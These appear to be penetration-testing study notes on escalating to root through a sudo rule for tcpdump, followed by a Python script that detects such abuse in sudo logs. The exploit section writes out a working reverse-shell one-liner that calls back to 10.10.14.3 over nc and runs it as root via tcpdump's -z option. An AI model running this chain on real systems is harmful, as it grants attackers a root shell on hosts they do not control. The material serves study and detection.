Sudo Rights Abuse
Sample Exploitation
List the commands we can run as a higher-privileged user or root
$ sudo -l
Matching Defaults entries for sysadm on NIX02:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sysadm may run the following commands on NIX02:
    (root) NOPASSWD: /usr/sbin/tcpdump
Check the manual or look the binary up on GTFOBins
$ man tcpdump
<SNIP>
-z postrotate-command
    Used in conjunction with the -C or -G options, this will make `tcpdump` run "postrotate-command file" where the file is the savefile being closed after each rotation. For example, specifying -z gzip or -z bzip2 will compress each savefile using gzip or bzip2.
Create a listener
$ nc -lnvp 443
Exploit
$ cat /tmp/.test
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 443 >/tmp/f
$ sudo /usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
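Detection
On the defender's side, the sudo run above is logged with its full COMMAND field, including the -z argument. The Python example below is added here and is not part of the original notes: it scans sudo syslog lines for tcpdump runs whose -z helper is anything other than the compressors the man page names. The log lines are constructed samples, and the allow-list is an assumed site policy.

```python
import re

# Constructed sample lines in sudo's syslog format (not taken from a real host).
SAMPLE_LOG = """\
Jan 10 09:14:02 NIX02 sudo:   sysadm : TTY=pts/0 ; PWD=/home/sysadm ; USER=root ; COMMAND=/usr/sbin/tcpdump -ln -i ens192 -w /tmp/cap.pcap -G 60 -z gzip
Jan 10 09:20:41 NIX02 sudo:   sysadm : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
Jan 10 09:25:00 NIX02 sudo:   sysadm : TTY=pts/0 ; PWD=/home/sysadm ; USER=root ; COMMAND=/usr/sbin/tcpdump -ln -i ens192 -c 10
"""

SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.+)$")
# Assumption: site policy only permits the compressors named in the man page.
# Bare names resolve through sudo's secure_path, so full paths are never allow-listed.
ALLOWED_HELPERS = {"gzip", "bzip2"}
# Matches "-z", "-zVALUE" and bundled clusters such as "-lnz"; "-Z" does not match.
Z_CLUSTER = re.compile(r"^-[A-Za-z#]*?z(?P<inline>.*)$")


def postrotate_helpers(args):
    """Collect every -z value, whether separate, inline, or after a flag cluster."""
    helpers = []
    for i, tok in enumerate(args):
        m = Z_CLUSTER.match(tok)
        if m:
            nxt = args[i + 1] if i + 1 < len(args) else ""
            helpers.append(m.group("inline") or nxt)
    return helpers


def suspicious_tcpdump(log_text):
    """Return one finding per sudo tcpdump run with a non-allow-listed -z helper."""
    findings = []
    for line in log_text.splitlines():
        m = SUDO_RE.search(line)
        if not m:
            continue
        argv = m.group("cmd").split()
        if not argv or argv[0].rsplit("/", 1)[-1] != "tcpdump":
            continue
        bad = [h for h in postrotate_helpers(argv[1:]) if h not in ALLOWED_HELPERS]
        if bad:
            findings.append({"user": m.group("user"), "runas": m.group("runas"), "helpers": bad})
    return findings


if __name__ == "__main__":
    for finding in suspicious_tcpdump(SAMPLE_LOG):
        print(finding)
```

The cluster match is deliberately conservative, so an option bundle that happens to contain a lowercase z is reported for review rather than skipped.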